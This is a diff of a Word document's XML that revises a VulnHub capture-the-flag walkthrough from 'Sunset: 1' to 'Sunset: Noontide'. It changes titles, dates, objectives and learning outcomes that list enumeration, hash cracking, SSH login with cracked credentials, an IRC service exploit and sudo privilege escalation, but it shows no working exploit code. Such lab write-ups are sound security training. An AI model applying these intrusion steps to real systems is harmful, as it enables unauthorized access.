         <w:rPr>
@@ -10685,7 +10324,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Conduct periodic vulnerability assessments</w:t>
+        <w:t>• Regularly audit system configurations</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10715,11 +10354,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -10731,132 +10366,118 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Learning Outcomes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>This challenge reinforced several important penetration testing concepts:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Service enumeration and network discovery</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Identifying exposed sensitive files</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Password hash cracking techniques</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• SSH access using cracked credentials</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Exploiting sudo misconfigurations for privilege escalation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The machine demonstrates how </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Learning Outcomes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>This challenge reinforced:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>• The importance of thorough enumeration</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• How command injection vulnerabilities can lead to system compromise</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Identifying exposed sensitive files</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Exploiting Linux kernel vulnerabilities</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Privilege escalation techniques in Linux systems</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The lab demonstrates how </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>multiple small vulnerabilities combined can result in full system compromise</w:t>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>multiple small misconfigurations can lead to full system compromise</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18203,7 +17824,7 @@
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
 <CoverPageProperties xmlns="http://schemas.microsoft.com/office/2006/coverPageProps">
-  <PublishDate>2026-03-03T00:00:00</PublishDate>
+  <PublishDate>2026-03-16T00:00:00</PublishDate>
   <Abstract/>
   <CompanyAddress/>
   <CompanyPhone/>

--- a/Doc1.docx
+++ b/Doc1.docx
@@ -156,7 +156,7 @@
                                     <w:tag w:val=""/>
                                     <w:id w:val="-650599894"/>
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                                    <w:date w:fullDate="2026-03-16T00:00:00Z">
+                                    <w:date w:fullDate="2026-03-18T00:00:00Z">
                                       <w:dateFormat w:val="M/d/yyyy"/>
                                       <w:lid w:val="en-US"/>
                                       <w:storeMappedDataAs w:val="dateTime"/>
@@ -180,7 +180,7 @@
                                           <w:sz w:val="28"/>
                                           <w:szCs w:val="28"/>
                                         </w:rPr>
-                                        <w:t>3/16/2026</w:t>
+                                        <w:t>3/18/2026</w:t>
                                       </w:r>
                                     </w:p>
                                   </w:sdtContent>
@@ -3468,7 +3468,7 @@
                               <w:tag w:val=""/>
                               <w:id w:val="-650599894"/>
                               <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                              <w:date w:fullDate="2026-03-16T00:00:00Z">
+                              <w:date w:fullDate="2026-03-18T00:00:00Z">
                                 <w:dateFormat w:val="M/d/yyyy"/>
                                 <w:lid w:val="en-US"/>
                                 <w:storeMappedDataAs w:val="dateTime"/>
@@ -3492,7 +3492,7 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t>3/16/2026</w:t>
+                                  <w:t>3/18/2026</w:t>
                                 </w:r>
                               </w:p>
                             </w:sdtContent>
@@ -3968,7 +3968,7 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>8</w:t>
+                                      <w:t>9</w:t>
                                     </w:r>
                                   </w:sdtContent>
                                 </w:sdt>
@@ -4112,7 +4112,7 @@
                                   <w:sz w:val="72"/>
                                   <w:szCs w:val="72"/>
                                 </w:rPr>
-                                <w:t>8</w:t>
+                                <w:t>9</w:t>
                               </w:r>
                             </w:sdtContent>
                           </w:sdt>
@@ -4253,6 +4253,14 @@
                           <wps:txbx>
                             <w:txbxContent>
                               <w:p>
+                                <w:pPr>
+                                  <w:rPr>
+                                    <w:b/>
+                                    <w:bCs/>
+                                    <w:sz w:val="40"/>
+                                    <w:szCs w:val="40"/>
+                                  </w:rPr>
+                                </w:pPr>
                                 <w:r>
                                   <w:rPr>
                                     <w:b/>
@@ -4260,7 +4268,7 @@
                                     <w:sz w:val="40"/>
                                     <w:szCs w:val="40"/>
                                   </w:rPr>
-                                  <w:t>Sunset: 1 Walkthrough</w:t>
+                                  <w:t>Sunset: Noontide Walkthrough</w:t>
                                 </w:r>
                               </w:p>
                               <w:p>
@@ -4315,7 +4323,14 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t>Linux Privilege Escalation</w:t>
+                                  <w:t xml:space="preserve">Linux </w:t>
+                                </w:r>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:sz w:val="28"/>
+                                    <w:szCs w:val="28"/>
+                                  </w:rPr>
+                                  <w:t>Exploitation</w:t>
                                 </w:r>
                               </w:p>
                               <w:p>
@@ -4364,6 +4379,14 @@
                     <v:textbox>
                       <w:txbxContent>
                         <w:p>
+                          <w:pPr>
+                            <w:rPr>
+                              <w:b/>
+                              <w:bCs/>
+                              <w:sz w:val="40"/>
+                              <w:szCs w:val="40"/>
+                            </w:rPr>
+                          </w:pPr>
                           <w:r>
                             <w:rPr>
                               <w:b/>
@@ -4371,7 +4394,7 @@
                               <w:sz w:val="40"/>
                               <w:szCs w:val="40"/>
                             </w:rPr>
-                            <w:t>Sunset: 1 Walkthrough</w:t>
+                            <w:t>Sunset: Noontide Walkthrough</w:t>
                           </w:r>
                         </w:p>
                         <w:p>
@@ -4426,7 +4449,14 @@
                               <w:sz w:val="28"/>
                               <w:szCs w:val="28"/>
                             </w:rPr>
-                            <w:t>Linux Privilege Escalation</w:t>
+                            <w:t xml:space="preserve">Linux </w:t>
+                          </w:r>
+                          <w:r>
+                            <w:rPr>
+                              <w:sz w:val="28"/>
+                              <w:szCs w:val="28"/>
+                            </w:rPr>
+                            <w:t>Exploitation</w:t>
                           </w:r>
                         </w:p>
                         <w:p>
@@ -4502,7 +4532,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Sunset: 1 Walkthrough</w:t>
+        <w:t>Sunset: Noontide Walkthrough</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4562,7 +4592,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Boot2Root / Linux Privilege Escalation</w:t>
+        <w:t xml:space="preserve"> Boot2Root / Linux Exploitation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4596,6 +4626,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4612,10 +4653,10 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DAD747" wp14:editId="32E35191">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="1419168153" name="Picture 29"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1990ED69" wp14:editId="0DC78743">
+            <wp:extent cx="5731510" cy="2764155"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="129435928" name="Picture 30"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4623,7 +4664,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1419168153" name="Picture 1419168153"/>
+                    <pic:cNvPr id="129435928" name="Picture 129435928"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4641,7 +4682,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
+                      <a:ext cx="5731510" cy="2764155"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4713,7 +4754,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Sunset: 1 is a vulnerable Linux virtual machine from the VulnHub platform designed to test penetration testing skills such as service enumeration, credential discovery, password cracking, and privilege escalation.</w:t>
+        <w:t>Sunset: Noontide is a vulnerable Linux virtual machine from the VulnHub platform designed to test penetration testing skills such as network enumeration, service exploitation, and privilege escalation.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4763,7 +4804,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Identify open services on the target system</w:t>
+        <w:t>• Identify open services</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4773,7 +4814,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Extract credentials from exposed files</w:t>
+        <w:t>• Exploit vulnerable services</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4783,17 +4824,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Crack password hashes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>• Gain system access through SSH</w:t>
+        <w:t>• Gain initial shell access</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4813,38 +4844,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">• Capture the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>user flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>root flag</w:t>
+        <w:t>• Capture user and root flags</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4866,7 +4866,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:kern w:val="36"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
@@ -4929,7 +4928,7 @@
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="1582"/>
-        <w:gridCol w:w="1422"/>
+        <w:gridCol w:w="1849"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -5043,6 +5042,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5051,6 +5052,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5102,6 +5105,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5110,11 +5115,13 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>Sunset: 1</w:t>
+              <w:t>Sunset: Noontide</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5161,6 +5168,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5169,6 +5178,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5220,6 +5231,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5228,11 +5241,13 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>Debian Linux</w:t>
+              <w:t>Linux</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5279,6 +5294,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -5287,11 +5304,13 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>SSH</w:t>
+              <w:t>IRC Exploit</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5347,7 +5366,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
@@ -5381,26 +5399,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>Network Discovery</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The first step was to identify active machines on the local network.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5466,35 +5464,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>arp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
